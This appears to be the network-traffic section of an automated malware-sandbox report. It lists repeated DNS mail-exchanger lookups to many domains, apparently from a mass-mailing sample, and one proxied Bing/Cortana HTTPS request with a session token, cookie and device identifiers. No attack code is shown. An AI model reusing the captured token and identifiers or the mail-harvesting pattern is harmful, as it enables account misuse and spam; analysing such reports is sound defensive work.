Feb 20, 2023 09:52:10.113794088 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	tek-astore.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.119867086 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	netko.hr	none	none	0	3840	false
Feb 20, 2023 09:52:10.135394096 CET	8.8.8.8	192.168.2.5	0xb337	No error (0)	pb-mx11.pobox.com		64.147.108.52	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:10.936453104 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	tvrtka.hr	none	none	0	3840	false
Feb 20, 2023 09:52:10.936486006 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	somemail.ro	none	none	0	3840	false
Feb 20, 2023 09:52:10.939161062 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	tek-astore.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:11.033415079 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	somemail.ro	none	none	0	3840	false
Feb 20, 2023 09:52:11.134820938 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	arb.cz	none	none	0	3840	false
Feb 20, 2023 09:52:11.136253119 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	emaiserver.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:11.151743889 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	negdje.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.598361015 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	netcom.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.598361015 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	netcom.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.598361015 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	netcom.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.598361015 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	netcom.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.691003084 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	abcdefg.cz	none	none	0	3840	false
Feb 20, 2023 09:52:12.694283962 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	worldwideoffices.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.710670948 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	abcdef.hr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.746012926 CET	8.8.8.8	192.168.2.5	0xb0e3	No error (0)	mx01.earthlink-vadesecure.net		51.81.61.70	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:12.746089935 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	emaiserver.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.837760925 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	northcoast.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.837760925 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	northcoast.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.837760925 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	northcoast.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.837760925 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	northcoast.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:13.154414892 CET	8.8.8.8	192.168.2.5	0xaedd	No error (0)	mxb-00377f01.gslb.pphosted.com		185.132.181.97	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:13.286526918 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ektro.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:13.286765099 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	orice.ro	none	none	0	3840	false
Feb 20, 2023 09:52:13.289722919 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	netko.hr	none	none	0	3840	false
Feb 20, 2023 09:52:13.301683903 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	worldwideoffices.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:13.918652058 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x	none	none	0	15	false
Feb 20, 2023 09:52:13.997525930 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	tvrtka.hr	none	none	0	3840	false
Feb 20, 2023 09:52:13.997859001 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	tek-astore.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:14.003177881 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	orice.ro	none	none	0	3840	false
Feb 20, 2023 09:52:14.028593063 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ppp.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:14.233164072 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	somemail.ro	none	none	0	3840	false
Feb 20, 2023 09:52:14.319467068 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x	none	none	0	15	false
Feb 20, 2023 09:52:14.410996914 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	arb.cz	none	none	0	3840	false
Feb 20, 2023 09:52:14.422199965 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cl.cam.ac.uk			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:14.510369062 CET	8.8.8.8	192.168.2.5	0x9e11	No error (0)	mx.cam.ac.uk		131.111.8.146	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:14.510369062 CET	8.8.8.8	192.168.2.5	0x9e11	No error (0)	mx.cam.ac.uk		131.111.8.147	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:14.510369062 CET	8.8.8.8	192.168.2.5	0x9e11	No error (0)	mx.cam.ac.uk		131.111.8.148	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:14.510369062 CET	8.8.8.8	192.168.2.5	0x9e11	No error (0)	mx.cam.ac.uk		131.111.8.149	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:14.994918108 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	emaiserver.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:15.034980059 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ppp.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:15.112905025 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	abcdefg.cz	none	none	0	3840	false
Feb 20, 2023 09:52:15.640132904 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ektro.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:15.665849924 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	worldwideoffices.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:16.716937065 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	src.dec.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:16.937860012 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	tek-astore.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:16.940207005 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	orice.ro	none	none	0	3840	false
Feb 20, 2023 09:52:18.071196079 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	theriver.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.205238104 CET	8.8.8.8	192.168.2.5	0x569c	No error (0)	ismtp.sitestar.everyone.net		64.29.151.236	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:18.362678051 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	src.dec.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.498406887 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	somemail.ro	none	none	0	3840	false
Feb 20, 2023 09:52:18.638863087 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x	none	none	0	15	false
Feb 20, 2023 09:52:18.730160952 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	bryson.demon.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.741507053 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	emaiserver.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.820254087 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ppp.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.935686111 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	worldwideoffices.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:19.104353905 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	onlineconnections.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:19.297688007 CET	8.8.8.8	192.168.2.5	0x8f88	No error (0)	onlineconnections.com.au		192.254.190.168	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:19.400259018 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	orice.ro	none	none	0	3840	false
Feb 20, 2023 09:52:19.798002005 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x	none	none	0	15	false
Feb 20, 2023 09:52:20.039546967 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	src.dec.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:20.302826881 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	ppp.ro	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:20.498152971 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	bryson.demon.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.010580063 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.010580063 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.010580063 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.010580063 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.013571978 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	uiuc.edu			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.035080910 CET	8.8.8.8	192.168.2.5	0xa4ae	Name error (3)	mx2-lw-eu.apache.org	none	none	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:21.049257040 CET	8.8.8.8	192.168.2.5	0x69fc	No error (0)	incoming-relays.illinois.edu		148.163.139.28	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:21.049257040 CET	8.8.8.8	192.168.2.5	0x69fc	No error (0)	incoming-relays.illinois.edu		148.163.135.28	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:23.338444948 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	bryson.demon.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.351917028 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	src.dec.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.355293989 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	jk.uni-linz.ac.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.355293989 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	jk.uni-linz.ac.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.355293989 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	jk.uni-linz.ac.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.355293989 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	jk.uni-linz.ac.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.463279963 CET	8.8.8.8	192.168.2.5	0x4716	No error (0)	mail3.edvz.uni-linz.ac.at		140.78.3.83	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:23.590147972 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	linuxnet.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.206415892 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.206415892 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.206415892 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.206415892 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.207151890 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	bryson.demon.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.239270926 CET	8.8.8.8	192.168.2.5	0x4c7	Name error (3)	mx1-lw-eu.apache.org	none	none	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:24.263324022 CET	8.8.8.8	192.168.2.5	0x49b	No error (0)	linuxnet.com		153.127.71.68	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:25.574986935 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.574986935 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.574986935 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.574986935 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	openoffice.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.605881929 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cdata.tvnet.hu			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.610598087 CET	8.8.8.8	192.168.2.5	0xc89b	Name error (3)	mx1-lw-eu.apache.org	none	none	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:26.937467098 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:26.965159893 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cdata.tvnet.hu			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.382065058 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	contoso.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.473747969 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	example.mx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.474834919 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	litwareinc.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.529593945 CET	8.8.8.8	192.168.2.5	0xec3c	No error (0)	smtp.litwareinc.com		96.47.154.206	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:28.694819927 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	fabrikam.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.755259991 CET	8.8.8.8	192.168.2.5	0xe40d	No error (0)	mail.fabrikam.com		131.107.55.31	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:28.990405083 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.171946049 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.322598934 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.353977919 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.498670101 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.623583078 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.646533966 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.696472883 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.712127924 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.781193972 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.861732006 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.866183996 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:52:29.996558905 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:52:30.136449099 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	musical.com.br			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:31.015826941 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false

HTTP Request Dependency Graph

https:

www.bing.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49700	23.0.174.123	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:50:16 UTC	0	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Content-type: text/xml X-MSEdge-ExternalExpType: JointCoord X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40 X-PositionerType: Desktop X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage X-Search-SafeSearch: Moderate X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8} X-UserAgeClass: Unknown X-BM-Market: US X-BM-DateFormat: M/d/yyyy X-CortanaAccessAboveLock: false X-Device-OSSKU: 48 X-BM-DTZ: -420 X-BM-FirstEnabledTime: 132061340710069592 X-DeviceID: 0100748C0900F045 X-BM-DeviceScale: 100 X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time X-BM-Theme: 000000;0078d7 X-BM-DeviceDimensionsLogical: 1232x1024 X-BM-DeviceDimensions: 1232x1024 X-Agent-DeviceId: 0100748C0900F045 X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATGOjhyCBrEl1Awji/g7SRpxfRm6uWBRuknppntx4OiUWhXYc4%2B3VQnWDF1be33N1ghsq3j4YMAI/YDUY38tMDQIa0safxbjvckEvW4tNqBM1O4tKr8hfvcKDOdVm5hOMuYmheSrgvEMOdpMN3JcqX5ZBSUZe4n9Mmx6YOtZo48C5mjJh%2Bzx42WFFIOLDIsKQmst1kJcfpJufkc0ZX4mGVgSQ3X%2BJNyj779EzrVHCPzqC9eEVVLpIgcQYH8VU5MPtC58KC2FM2gsmwePhmSBv5sAa35vDVSISQeT7PeFAb6eSz6jRU44rclCl9/zWgC2fmbvB5IeckE0QQ6uFneWYVsDZgAACNQSEqqyOT5iqAH5MRxWMYLqTyO2njozjedhAQ7YM0I82pzzoXTQ6tg332TSA2bDgR6Njn%2BNsmaq46AFimVMA5PShcvlHPpo7GqVeEWUtUledDOHejewOg/eCCo62oigQWy6B5/%2BH5Ce8OaZ1S6C/io7kvSaiD5Ggnb5dJowaWVfqx5x8e1c1YLcq5ezMB5IHUKhZINnTjvxvvUH%2BApHhRlENBwpIz5nN3v0OvdBVXAyrr2lQ9wYKsxTBreDU52epgCfgBSzvic6nyceUMT2G8cKJ5ad1FGZ0AGzleGhsX45QvQVBQRKiJ30E1rd22y7nZSTEXt%2BPT2h9dFP1MWr2kPCdqhXX5DGqUsvUXfxYG4qE93TMRMWuyg4MFCpWOYN5YxP85QjHsTwM9g6pblWpt4UQvxcD9d6sohVPA1Ammt8L5wtebIFFZptYU41hWJqpCZVQSwkefgUS2PpUd9EGRiPJbh1K2bkIv/0erBIrXPhhiVeyO%2BjCWNR0ltJADhqhNpuC32hi2A8k3%2BHrhg7cXM1Yx11gfh7OnF37PsvK6keCy0L94WbIS2ZOUSG33rPdEQv1gE%3D%26p%3D X-BM-CBT: 1660688483 X-Device-isOptin: true X-Device-Touch: false X-Device-ClientSession: A093DD4137F64C659186F72CE611649C X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: www.bing.com Content-Length: 86635 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1660688519156&AC=1&CPH=4ef661f2&HV=1660688519
2023-02-20 08:50:16 UTC	2	OUT	Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
2023-02-20 08:50:16 UTC	18	OUT	Data Raw: 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 65 72 72 6f 72 54 79 70 65 22 3a 22 53 65 6e 64 54 69 6d 65 64 4f 75 74 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 31 2c 22 54 53 22 3a 31 35 36 31 36 36 30 35 33 36 35 39 31 2c 22 52 54 53 22 3a 36 35 33 32 39 2c 22 53 45 51 22 3a 32 31 2c 22 55 54 53 22 3a 31 36 37 36 39 31 35 34 31 35 36 32 37 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 35 36 31 36 36 30 35 33 36 35 39 31 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47 3e 34 35 38 32 38 37 35 61 63 64 65 34 34 34 61 34 38 35 61 61 63 63 34 31 30 33 Data Ascii: pdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"SendTimedOut","failCount":1,"TS":1561660536591,"RTS":65329,"SEQ":21,"UTS":1676915415627}...</D><TS>1561660536591</TS></E><E><T>Event.CIQueueError</T><IG>4582875acde444a485aacc4103
2023-02-20 08:50:16 UTC	34	OUT	Data Raw: 76 69 63 65 48 69 73 74 6f 72 79 45 6e 61 62 6c 65 64 22 3a 31 2c 22 77 69 6e 64 6f 77 73 41 63 63 6f 75 6e 74 22 3a 22 33 22 2c 22 63 6f 72 74 61 6e 61 41 63 63 6f 75 6e 74 22 3a 22 33 22 2c 22 73 65 61 72 63 68 42 6f 78 49 6e 54 61 73 6b 62 61 72 22 3a 31 2c 22 74 61 73 6b 62 61 72 4f 72 69 65 6e 74 61 74 69 6f 6e 22 3a 34 2c 22 44 65 76 69 63 65 49 44 22 3a 22 7b 41 32 41 42 35 32 36 41 2d 44 33 38 44 2d 34 46 43 39 2d 38 42 41 30 2d 45 33 34 42 38 44 36 33 35 34 45 38 7d 22 2c 22 49 73 54 6f 75 63 68 22 3a 22 66 61 6c 73 65 22 2c 22 4f 53 53 4b 55 22 3a 22 34 38 22 2c 22 41 70 70 4c 69 66 65 74 69 6d 65 49 44 22 3a 22 33 37 37 36 42 43 34 41 35 45 37 43 34 30 33 32 42 41 45 44 36 41 39 37 42 42 42 38 35 38 31 37 22 2c 22 43 6f 72 74 61 6e 61 4f 70 74 Data Ascii: viceHistoryEnabled":1,"windowsAccount":"3","cortanaAccount":"3","searchBoxInTaskbar":1,"taskbarOrientation":4,"DeviceID":"{A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}","IsTouch":"false","OSSKU":"48","AppLifetimeID":"3776BC4A5E7C4032BAED6A97BBB85817","CortanaOpt
2023-02-20 08:50:16 UTC	50	OUT	Data Raw: 34 63 30 32 2d 38 66 65 38 2d 62 61 32 63 30 34 39 64 39 38 30 39 22 2c 22 63 69 56 65 72 73 69 6f 6e 22 3a 22 31 22 7d 7d 2c 7b 22 54 22 3a 22 44 2e 50 50 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 50 50 22 2c 22 53 43 22 3a 32 2c 22 44 53 22 3a 5b 7b 22 54 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 30 30 31 2c 22 51 22 3a 22 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 22 2c 22 56 61 6c 22 3a 22 50 50 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 30 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 33 31 32 33 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d Data Ascii: 4c02-8fe8-ba2c049d9809","ciVersion":"1"}},{"T":"D.PP","AppNS":"SmartSearch","Service":"AutoSuggest","Scenario":"PP","SC":2,"DS":[{"T":"D.Url","K":1001,"Q":"Internet Explorer","Val":"PP","Ho":2,"Gr":0,"DeviceSignals":{"Rank":3123,"PHits":"System.ParsingNam
